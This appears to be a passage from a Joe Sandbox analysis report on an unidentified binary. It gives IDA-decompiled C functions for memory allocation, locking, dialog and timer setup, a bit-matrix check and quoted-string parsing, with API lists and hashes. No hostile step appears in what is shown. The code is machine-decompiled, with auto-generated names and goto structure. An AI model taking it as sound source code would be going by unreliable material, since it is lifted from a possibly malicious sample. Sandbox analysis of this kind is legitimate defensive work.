                                          0x00416623
                                          0x00416641
                                          0x00416647
                                          0x0041664d
                                          0x00416650
                                          0x00416650
                                          0x00416653
                                          0x00416656
                                          0x00416659
                                          0x0041665c
                                          0x00416663
                                          0x00416665
                                          0x0041666f
                                          0x00416670
                                          0x00416672
                                          0x00416675
                                          0x00416678
                                          0x00416684
                                          0x0041668c
                                          0x00416695
                                          0x0041669c
                                          0x0041669f
                                          0x004166a1
                                          0x004166a8
                                          0x004166a8
                                          0x00000000
                                          0x004166b0

                                          APIs
                                          • HeapAlloc.KERNEL32(00000000,00002020,00420818,00420818,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000), ref: 004165BD
                                          • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000), ref: 004165E1
                                          • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000), ref: 004165FB
                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000,?), ref: 004166BC
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000,?,00000000), ref: 004166D3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: AllocVirtual$FreeHeap
                                          • String ID:
                                          • API String ID: 714016831-0
                                          • Opcode ID: 3cebd7198669312bdcb80342c8511f4e4e3300f6cdfd7be81cbf94ce20f50e4e
                                          • Instruction ID: 0af9858cac0a30669fb94f5f64461d90f8de944a7195c69e4f59e8ed45fdce2d
                                          • Opcode Fuzzy Hash: 3cebd7198669312bdcb80342c8511f4e4e3300f6cdfd7be81cbf94ce20f50e4e
                                          • Instruction Fuzzy Hash: 983101B0700705EBD3309F24EC45BA2BBE4EB44794F12823AE55597791E778E8818BCC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409787 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E00409787(void* __ecx, void* __edx) {
				signed int _t48;
				intOrPtr* _t54;
				signed int _t60;
				intOrPtr _t61;
				void* _t76;
				struct _CRITICAL_SECTION* _t80;
				signed int _t81;
				void* _t84;
				void* _t86;

				_t76 = __edx;
				E00413954(E00419CC0, _t86);
				_t84 = __ecx;
				_t80 = __ecx + 0x40;
				if(E004095DD(_t80) == 0) {
					E0040998D(__ecx);
					EnterCriticalSection(_t80);
					_t60 =  *(_t80 + 0x20);
					 *(_t86 - 0x10) =  *(_t80 + 0x24);
					 *((intOrPtr*)(_t86 - 0x20)) =  *((intOrPtr*)(_t80 + 0x28));
					 *((intOrPtr*)(_t86 - 0x1c)) =  *((intOrPtr*)(_t80 + 0x2c));
					LeaveCriticalSection(_t80);
					if(_t60 !=  *((intOrPtr*)(_t84 + 0x28)) ||  *(_t86 - 0x10) !=  *((intOrPtr*)(_t84 + 0x2c))) {
						E0040969B(_t84, _t60,  *(_t86 - 0x10));
					}
					E0040970E(_t84,  *((intOrPtr*)(_t86 - 0x20)),  *((intOrPtr*)(_t86 - 0x1c)));
					_t81 = 0;
					if((_t60 |  *(_t86 - 0x10)) == 0) {
						 *(_t86 - 0x10) = _t81;
						_t60 = 1;
					}
					_t61 = E00413D80(E00414490( *((intOrPtr*)(_t86 - 0x20)),  *((intOrPtr*)(_t86 - 0x1c)), 0x64, _t81), _t76, _t60,  *(_t86 - 0x10));
					if(_t61 !=  *((intOrPtr*)(_t84 + 0x34))) {
						asm("cdq");
						E00403A0B(_t86 - 0xa4, _t76, _t47, _t76);
						E00401C80(_t86 - 0x18, _t86 - 0xa4);
						 *(_t86 - 4) = _t81;
						E00407D25(_t86 - 0x18, _t76, L"% ");
						_push(_t84 + 0xc);
						_t54 = E00402634(_t86 - 0x24, _t86 - 0x18);
						 *(_t86 - 4) = 1;
						E00406049( *((intOrPtr*)(_t84 + 4)),  *_t54);
						E00403A9C( *((intOrPtr*)(_t86 - 0x24)));
						 *((intOrPtr*)(_t84 + 0x34)) = _t61;
						E00403A9C( *((intOrPtr*)(_t86 - 0x18)));
					}
					_t48 = 1;
				} else {
					_t48 = 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t86 - 0xc));
				return _t48;
			}












                                          0x00409787
                                          0x0040978c
                                          0x00409798
                                          0x0040979b
                                          0x004097a7
                                          0x004097b3
                                          0x004097b9
                                          0x004097c2
                                          0x004097c5
                                          0x004097cb
                                          0x004097d2
                                          0x004097d5
                                          0x004097de
                                          0x004097ee
                                          0x004097ee
                                          0x004097fb
                                          0x00409807
                                          0x00409808
                                          0x0040980c
                                          0x0040980f
                                          0x0040980f
                                          0x00409829
                                          0x0040982e
                                          0x00409830
                                          0x00409839
                                          0x00409848
                                          0x00409855
                                          0x00409858
                                          0x00409863
                                          0x00409867
                                          0x00409871
                                          0x00409875
                                          0x0040987d
                                          0x00409885
                                          0x00409888
                                          0x0040988e
                                          0x0040988f
                                          0x004097a9
                                          0x004097a9
                                          0x004097a9
                                          0x00409897
                                          0x0040989f

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 0040978C
                                            • Part of subcall function 004095DD: EnterCriticalSection.KERNEL32(?,?,?,00409903), ref: 004095E2
                                            • Part of subcall function 004095DD: LeaveCriticalSection.KERNEL32(?,?,?,00409903), ref: 004095EC
                                          • EnterCriticalSection.KERNEL32(?), ref: 004097B9
                                          • LeaveCriticalSection.KERNEL32(?), ref: 004097D5
                                          • __aulldiv.LIBCMT ref: 00409824
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave$H_prolog__aulldiv
                                          • String ID:
                                          • API String ID: 3848147900-0
                                          • Opcode ID: 985cff57d02d2bbd00f179e979cdbab89758c627aa779ce2aa11222f2ed784f0
                                          • Instruction ID: 0a470d0c852558693c62499fef9fcf54cb9603282822d0262474d13d459b1607
                                          • Opcode Fuzzy Hash: 985cff57d02d2bbd00f179e979cdbab89758c627aa779ce2aa11222f2ed784f0
                                          • Instruction Fuzzy Hash: D2316076A00219AFCB10EFA1C881AEFBBB5FF48314F00442EE10573692CB79AD45CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004095F7 Relevance: 6.0, APIs: 4, Instructions: 37windowtimeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004095F7(void* __ecx) {
				void* _t32;

				_t32 = __ecx;
				 *(__ecx + 0x28) =  *(__ecx + 0x28) | 0xffffffff;
				 *(__ecx + 0x2c) =  *(__ecx + 0x2c) | 0xffffffff;
				 *(__ecx + 0x34) =  *(__ecx + 0x34) | 0xffffffff;
				 *((char*)(__ecx + 0x38)) = 1;
				E00413260(__ecx + 0x3c);
				 *((intOrPtr*)(_t32 + 0x30)) = GetDlgItem( *(__ecx + 4), 0x3e8);
				if( *(_t32 + 0x70) >= 0) {
					SendMessageA( *(_t32 + 4), 0x80, 1, LoadIconA( *0x423144,  *(_t32 + 0x70) & 0x0000ffff));
				}
				 *((intOrPtr*)(_t32 + 8)) = SetTimer( *(_t32 + 4), 3, 0x64, 0);
				E00406049( *(_t32 + 4),  *((intOrPtr*)(_t32 + 0xc)));
				E0040998D(_t32);
				return 1;
			}




                                          0x004095f8
                                          0x004095fa
                                          0x004095fe
                                          0x00409602
                                          0x00409609
                                          0x0040960d
                                          0x00409624
                                          0x00409627
                                          0x00409645
                                          0x00409645
                                          0x00409660
                                          0x00409663
                                          0x0040966a
                                          0x00409672

                                          APIs
                                            • Part of subcall function 00413260: SetEvent.KERNEL32(00000000,00407649), ref: 00413263
                                          • GetDlgItem.USER32 ref: 0040961A
                                          • LoadIconA.USER32(00000000), ref: 00409634
                                          • SendMessageA.USER32 ref: 00409645
                                          • SetTimer.USER32(?,00000003,00000064,00000000), ref: 00409654
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: EventIconItemLoadMessageSendTimer
                                          • String ID:
                                          • API String ID: 2758541657-0
                                          • Opcode ID: a2a1fe83cc9e0c6555ab30a5ba5d34d7e9637e7b1c96707fcad98147a719e390
                                          • Instruction ID: 551790b6ae67963d7c94afa5d69916b6b09ae611f895d6b9f891aac7cfc7161a
                                          • Opcode Fuzzy Hash: a2a1fe83cc9e0c6555ab30a5ba5d34d7e9637e7b1c96707fcad98147a719e390
                                          • Instruction Fuzzy Hash: AF010830140B00AFD7219B21DD5AB66BBA1BF04721F008B2DE9A7959E0CB76B951CB48
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040D7CC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040D7CC(void* __ecx) {
				signed int _t118;
				signed int _t129;
				signed int* _t130;
				signed int _t150;
				signed int _t151;
				signed int _t160;
				intOrPtr _t162;
				signed int* _t180;
				signed int _t181;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t195;
				signed int _t196;
				intOrPtr _t198;
				void* _t200;
				signed int* _t202;
				void* _t203;

				E00413954(E0041A61C, _t203);
				_t200 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) > 0x20 ||  *((intOrPtr*)(__ecx + 0x1c)) > 0x20) {
					L31:
					_t118 = 0;
				} else {
					E004032A8(_t203 - 0x28, 1);
					 *((intOrPtr*)(_t203 - 0x28)) = 0x41b748;
					_t150 = 0;
					 *(_t203 - 4) = 0;
					E0040D9F9(_t203 - 0x28,  *((intOrPtr*)(__ecx + 0x30)) +  *((intOrPtr*)(__ecx + 0x1c)));
					_t190 = 0;
					if( *((intOrPtr*)(_t200 + 0x1c)) <= 0) {
						L5:
						_t191 = 0;
						if( *((intOrPtr*)(_t200 + 0x30)) <= _t150) {
							L8:
							E0040D9F9(_t203 - 0x28,  *((intOrPtr*)(_t200 + 0x44)));
							_t192 = 0;
							if( *((intOrPtr*)(_t200 + 0x1c)) <= _t150) {
								L11:
								 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
								E004042AD(_t203 - 0x28);
								_t160 = 0x20;
								memset(_t203 - 0xd0, 0, _t160 << 2);
								_t162 = 4;
								 *(_t203 - 0x38) = _t150;
								 *(_t203 - 0x34) = _t150;
								 *(_t203 - 0x30) = _t150;
								 *((intOrPtr*)(_t203 - 0x2c)) = 0;
								 *((intOrPtr*)(_t203 - 0x3c)) = 0x41b378;
								 *(_t203 - 4) = 1;
								 *(_t203 - 0x4c) = _t150;
								 *(_t203 - 0x48) = _t150;
								 *(_t203 - 0x44) = _t150;
								 *((intOrPtr*)(_t203 - 0x40)) = _t162;
								 *((intOrPtr*)(_t203 - 0x50)) = 0x41b378;
								 *(_t203 - 4) = 2;
								 *(_t203 - 0x10) = _t150;
								if( *((intOrPtr*)(_t200 + 8)) > _t150) {
									do {
										 *(_t203 - 0x14) = _t150;
										_t198 =  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0xc)) +  *(_t203 - 0x10) * 4));
										if( *((intOrPtr*)(_t198 + 0x14)) > _t150) {
											do {
												E004039DF(_t203 - 0x3c,  *(_t203 - 0x10));
												 *(_t203 - 0x14) =  *(_t203 - 0x14) + 1;
											} while ( *(_t203 - 0x14) <  *((intOrPtr*)(_t198 + 0x14)));
										}
										 *(_t203 - 0x14) = _t150;
										if( *((intOrPtr*)(_t198 + 0x18)) > _t150) {
											do {
												E004039DF(_t203 - 0x50,  *(_t203 - 0x10));
												 *(_t203 - 0x14) =  *(_t203 - 0x14) + 1;
											} while ( *(_t203 - 0x14) <  *((intOrPtr*)(_t198 + 0x18)));
										}
										 *(_t203 - 0x10) =  *(_t203 - 0x10) + 1;
									} while ( *(_t203 - 0x10) <  *((intOrPtr*)(_t200 + 8)));
								}
								_t195 = 0;
								if( *((intOrPtr*)(_t200 + 0x1c)) > _t150) {
									do {
										_t151 = 1;
										 *(_t203 +  *( *(_t203 - 0x30) +  *( *((intOrPtr*)(_t200 + 0x20)) + _t195 * 8) * 4) * 4 - 0xd0) =  *(_t203 +  *( *(_t203 - 0x30) +  *( *((intOrPtr*)(_t200 + 0x20)) + _t195 * 8) * 4) * 4 - 0xd0) | _t151 <<  *( *(_t203 - 0x44) + ( *((intOrPtr*)(_t200 + 0x20)) + _t195 * 8)[1] * 4);
										_t195 = _t195 + 1;
									} while (_t195 <  *((intOrPtr*)(_t200 + 0x1c)));
									_t150 = 0;
								}
								 *(_t203 - 4) = 1;
								E004042AD(_t203 - 0x50);
								 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
								E004042AD(_t203 - 0x3c);
								_t180 = _t203 - 0xd0;
								 *(_t203 - 0x14) = 0x20;
								do {
									 *(_t203 - 0x10) = _t150;
									_t202 = _t203 - 0xd0;
									do {
										_t129 =  *_t180;
										_t196 = 1;
										if((_t129 & _t196 <<  *(_t203 - 0x10)) != 0) {
											 *_t180 = _t129 |  *_t202;
										}
										 *(_t203 - 0x10) =  *(_t203 - 0x10) + 1;
										_t202 =  &(_t202[1]);
									} while ( *(_t203 - 0x10) < 0x20);
									_t180 =  &(_t180[1]);
									_t106 = _t203 - 0x14;
									 *_t106 =  *(_t203 - 0x14) - 1;
								} while ( *_t106 != 0);
								_t130 = _t203 - 0xd0;
								while(1) {
									_t181 = 1;
									if(( *_t130 & _t181 << _t150) != 0) {
										goto L31;
									}
									_t150 = _t150 + 1;
									_t130 =  &(_t130[1]);
									if(_t150 < 0x20) {
										continue;
									} else {
										_t118 = 1;
									}
									goto L32;
								}
								goto L31;
							} else {
								while(E0040DA1F(_t203 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x20)) + 4 + _t192 * 8))) == 0) {
									_t192 = _t192 + 1;
									if(_t192 <  *((intOrPtr*)(_t200 + 0x1c))) {
										continue;
									} else {
										goto L11;
									}
									goto L32;
								}
								goto L30;
							}
						} else {
							while(E0040DA1F(_t203 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x34)) + _t191 * 4))) == 0) {
								_t191 = _t191 + 1;
								if(_t191 <  *((intOrPtr*)(_t200 + 0x30))) {
									continue;
								} else {
									goto L8;
								}
								goto L32;
							}
							goto L30;
						}
					} else {
						while(E0040DA1F(_t203 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x20)) + _t190 * 8))) == 0) {
							_t190 = _t190 + 1;
							if(_t190 <  *((intOrPtr*)(_t200 + 0x1c))) {
								continue;
							} else {
								goto L5;
							}
							goto L32;
						}
						L30:
						 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
						E004042AD(_t203 - 0x28);
						goto L31;
					}
				}
				L32:
				 *[fs:0x0] =  *((intOrPtr*)(_t203 - 0xc));
				return _t118;
			}





















                                          0x0040d7d1
                                          0x0040d7de
                                          0x0040d7e7
                                          0x0040d9e8
                                          0x0040d9e8
                                          0x0040d7f7
                                          0x0040d7fc
                                          0x0040d801
                                          0x0040d80e
                                          0x0040d816
                                          0x0040d819
                                          0x0040d81e
                                          0x0040d823
                                          0x0040d841
                                          0x0040d841
                                          0x0040d846
                                          0x0040d864
                                          0x0040d86a
                                          0x0040d86f
                                          0x0040d874
                                          0x0040d893
                                          0x0040d893
                                          0x0040d89a
                                          0x0040d8a3
                                          0x0040d8aa
                                          0x0040d8b3
                                          0x0040d8b4
                                          0x0040d8b7
                                          0x0040d8ba
                                          0x0040d8bd
                                          0x0040d8c0
                                          0x0040d8c3
                                          0x0040d8ca
                                          0x0040d8cd
                                          0x0040d8d0
                                          0x0040d8d3
                                          0x0040d8d6
                                          0x0040d8dc
                                          0x0040d8e0
                                          0x0040d8e3
                                          0x0040d8e5
                                          0x0040d8eb
                                          0x0040d8ee
                                          0x0040d8f4
                                          0x0040d8f6
                                          0x0040d8fc
                                          0x0040d901
                                          0x0040d907
                                          0x0040d8f6
                                          0x0040d90f
                                          0x0040d912
                                          0x0040d914
                                          0x0040d91a
                                          0x0040d91f
                                          0x0040d925
                                          0x0040d914
                                          0x0040d92a
                                          0x0040d930
                                          0x0040d8e5
                                          0x0040d935
                                          0x0040d93a
                                          0x0040d93c
                                          0x0040d94a
                                          0x0040d960
                                          0x0040d962
                                          0x0040d963
                                          0x0040d968
                                          0x0040d968
                                          0x0040d96d
                                          0x0040d971
                                          0x0040d976
                                          0x0040d97d
                                          0x0040d982
                                          0x0040d988
                                          0x0040d98f
                                          0x0040d98f
                                          0x0040d992
                                          0x0040d998
                                          0x0040d99b
                                          0x0040d99f
                                          0x0040d9a4
                                          0x0040d9a8
                                          0x0040d9a8
                                          0x0040d9aa
                                          0x0040d9ad
                                          0x0040d9b0
                                          0x0040d9b6
                                          0x0040d9b9
                                          0x0040d9b9
                                          0x0040d9b9
                                          0x0040d9be
                                          0x0040d9c4
                                          0x0040d9c8
                                          0x0040d9cd
                                          0x00000000
                                          0x00000000
                                          0x0040d9cf
                                          0x0040d9d0
                                          0x0040d9d6
                                          0x00000000
                                          0x0040d9d8
                                          0x0040d9d8
                                          0x0040d9d8
                                          0x00000000
                                          0x0040d9d6
                                          0x00000000
                                          0x0040d876
                                          0x0040d876
                                          0x0040d88d
                                          0x0040d891
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040d891
                                          0x00000000
                                          0x0040d876
                                          0x0040d848
                                          0x0040d848
                                          0x0040d85e
                                          0x0040d862
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040d862
                                          0x00000000
                                          0x0040d848
                                          0x0040d825
                                          0x0040d825
                                          0x0040d83b
                                          0x0040d83f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040d83f
                                          0x0040d9dc
                                          0x0040d9dc
                                          0x0040d9e3
                                          0x00000000
                                          0x0040d9e3
                                          0x0040d823
                                          0x0040d9ea
                                          0x0040d9f0
                                          0x0040d9f8

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: $
                                          • API String ID: 3519838083-227171996
                                          • Opcode ID: f310208c7012b047481696f3de0866f141f831578990e3312a3a639e5dd044ff
                                          • Instruction ID: b608afa5533618173c50a936dd0dc92eebd328cd23ff399218f1dfb4b0bc6294
                                          • Opcode Fuzzy Hash: f310208c7012b047481696f3de0866f141f831578990e3312a3a639e5dd044ff
                                          • Instruction Fuzzy Hash: 6A713571E0020A9FCB24DF99D481AAEB7B1FF48314F10457ED416B7691D734AA8ACF54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403D5A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 152COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 89%
                                          			E00403D5A(intOrPtr* __ecx, intOrPtr __edx) {
				void* __edi;
				void* _t69;
				signed int _t70;
				intOrPtr _t79;
				intOrPtr _t90;
				signed int _t91;
				char _t98;
				char _t116;
				intOrPtr* _t136;
				void* _t138;

				E00413954(E004194DC, _t138);
				_t136 = __ecx;
				 *((intOrPtr*)(_t138 - 0x20)) = __edx;
				E004042D6();
				 *((intOrPtr*)(_t138 - 0x10)) = 0;
				while(1) {
					L1:
					_t69 = E00403FE2(_t136, _t138 - 0x10);
					_t146 = _t69;
					if(_t69 == 0) {
						break;
					}
					E00402EE1(_t138 - 0x50);
					 *(_t138 - 4) = 0;
					E00402EE1(_t138 - 0x44);
					_t7 = _t138 - 0x14; // 0x414be4
					 *(_t138 - 4) = 1;
					E00403F3C(_t138 - 0x38,  *_t136 +  *((intOrPtr*)(_t138 - 0x10)));
					 *(_t138 - 4) = 2;
					if(E0040411F(_t138 - 0x38, _t138 - 0x50, _t146) == 0) {
						L26:
						E00403A9C( *((intOrPtr*)(_t138 - 0x38)));
						E00403A9C( *((intOrPtr*)(_t138 - 0x44)));
						E00403A9C( *((intOrPtr*)(_t138 - 0x50)));
						L28:
						_t70 = 0;
						__eflags = 0;
						L29:
						 *[fs:0x0] =  *((intOrPtr*)(_t138 - 0xc));
						return _t70;
					}
					_t15 = _t138 - 0x14; // 0x414be4
					_t79 =  *_t15;
					if(_t79 == 0) {
						goto L26;
					}
					 *((intOrPtr*)(_t138 - 0x10)) =  *((intOrPtr*)(_t138 - 0x10)) + _t79;
					if(E00403FE2(_t136, _t138 - 0x10) == 0 ||  *((char*)( *_t136 +  *((intOrPtr*)(_t138 - 0x10)))) != 0x3d) {
						goto L26;
					} else {
						 *((intOrPtr*)(_t138 - 0x10)) =  *((intOrPtr*)(_t138 - 0x10)) + 1;
						if(E00403FE2(_t136, _t138 - 0x10) == 0 ||  *((char*)( *_t136 +  *((intOrPtr*)(_t138 - 0x10)))) != 0x22) {
							goto L26;
						} else {
							 *((intOrPtr*)(_t138 - 0x10)) =  *((intOrPtr*)(_t138 - 0x10)) + 1;
							 *((intOrPtr*)(_t138 - 0x2c)) = 0;
							 *((intOrPtr*)(_t138 - 0x28)) = 0;
							 *((intOrPtr*)(_t138 - 0x24)) = 0;
							E0040243E(_t138 - 0x2c, 3);
							 *(_t138 - 4) = 3;
							while( *((intOrPtr*)(_t138 - 0x10)) <  *((intOrPtr*)(_t136 + 4))) {
								_t90 =  *_t136;
								_t116 =  *((intOrPtr*)(_t90 +  *((intOrPtr*)(_t138 - 0x10))));
								 *((intOrPtr*)(_t138 - 0x10)) =  *((intOrPtr*)(_t138 - 0x10)) + 1;
								 *((char*)(_t138 - 0x1c)) = _t116;
								if(_t116 == 0x22) {
									_t91 = E0040411F(_t138 - 0x2c, _t138 - 0x44, __eflags);
									__eflags = _t91;
									if(_t91 == 0) {
										break;
									}
									_push(_t138 - 0x50);
									E004040BE( *((intOrPtr*)(_t138 - 0x20)), 0);
									E00403A9C( *((intOrPtr*)(_t138 - 0x2c)));
									E00403A9C( *((intOrPtr*)(_t138 - 0x38)));
									 *(_t138 - 4) =  *(_t138 - 4) | 0xffffffff;
									E0040213F(_t138 - 0x50);
									goto L1;
								}
								if(_t116 != 0x5c) {
									_push( *((intOrPtr*)(_t138 - 0x1c)));
								} else {
									_t98 =  *((intOrPtr*)(_t90 +  *((intOrPtr*)(_t138 - 0x10))));
									 *((intOrPtr*)(_t138 - 0x10)) =  *((intOrPtr*)(_t138 - 0x10)) + 1;
									 *((char*)(_t138 - 0x18)) = _t98;
									if(_t98 == 0x22) {
										_push(0x22);
									} else {
										if(_t98 == 0x5c) {
											_push(0x5c);
										} else {
											if(_t98 == 0x6e) {
												_push(0xa);
											} else {
												if(_t98 == 0x74) {
													_push(9);
												} else {
													E00401EE5(_t138 - 0x2c, 0x5c);
													_push( *((intOrPtr*)(_t138 - 0x18)));
												}
											}
										}
									}
								}
								E00401EE5(_t138 - 0x2c);
							}
							E00403A9C( *((intOrPtr*)(_t138 - 0x2c)));
							E00403A9C( *((intOrPtr*)(_t138 - 0x38)));
							E00403A9C( *((intOrPtr*)(_t138 - 0x44)));
							E00403A9C( *((intOrPtr*)(_t138 - 0x50)));
							goto L28;
						}
					}
				}
				_t70 = 1;
				goto L29;
			}













                                          0x00403d5f
                                          0x00403d68
                                          0x00403d6d
                                          0x00403d70
                                          0x00403d77
                                          0x00403d7a
                                          0x00403d7a
                                          0x00403d7f
                                          0x00403d84
                                          0x00403d86
                                          0x00000000
                                          0x00000000
                                          0x00403d8f
                                          0x00403d97
                                          0x00403d9a
                                          0x00403da1
                                          0x00403da8
                                          0x00403db5
                                          0x00403dc0
                                          0x00403dcb
                                          0x00403eec
                                          0x00403eef
                                          0x00403ef7
                                          0x00403eff
                                          0x00403f2c
                                          0x00403f2c
                                          0x00403f2c
                                          0x00403f2e
                                          0x00403f33
                                          0x00403f3b
                                          0x00403f3b
                                          0x00403dd1
                                          0x00403dd1
                                          0x00403dd6
                                          0x00000000
                                          0x00000000
                                          0x00403ddc
                                          0x00403deb
                                          0x00000000
                                          0x00403e00
                                          0x00403e00
                                          0x00403e0f
                                          0x00000000
                                          0x00403e24
                                          0x00403e24
                                          0x00403e2c
                                          0x00403e2f
                                          0x00403e32
                                          0x00403e35
                                          0x00403e3a
                                          0x00403e3e
                                          0x00403e4a
                                          0x00403e4f
                                          0x00403e52
                                          0x00403e58
                                          0x00403e5b
                                          0x00403eb0
                                          0x00403eb5
                                          0x00403eb7
                                          0x00000000
                                          0x00000000
                                          0x00403ebf
                                          0x00403ec0
                                          0x00403ec8
                                          0x00403ed0
                                          0x00403ed5
                                          0x00403ede
                                          0x00000000
                                          0x00403ede
                                          0x00403e60
                                          0x00403ea5
                                          0x00403e62
                                          0x00403e65
                                          0x00403e68
                                          0x00403e6d
                                          0x00403e70
                                          0x00403e99
                                          0x00403e72
                                          0x00403e74
                                          0x00403e95
                                          0x00403e76
                                          0x00403e78
                                          0x00403e91
                                          0x00403e7a
                                          0x00403e7c
                                          0x00403e8d
                                          0x00403e7e
                                          0x00403e83
                                          0x00403e88
                                          0x00403e88
                                          0x00403e7c
                                          0x00403e78
                                          0x00403e74
                                          0x00403e70
                                          0x00403e9e
                                          0x00403e9e
                                          0x00403f0c
                                          0x00403f14
                                          0x00403f1c
                                          0x00403f24
                                          0x00000000
                                          0x00403f29
                                          0x00403e0f
                                          0x00403deb
                                          0x00403ee8
                                          0x00000000

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00403D5F
                                            • Part of subcall function 00403F3C: __EH_prolog.LIBCMT ref: 00403F41
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
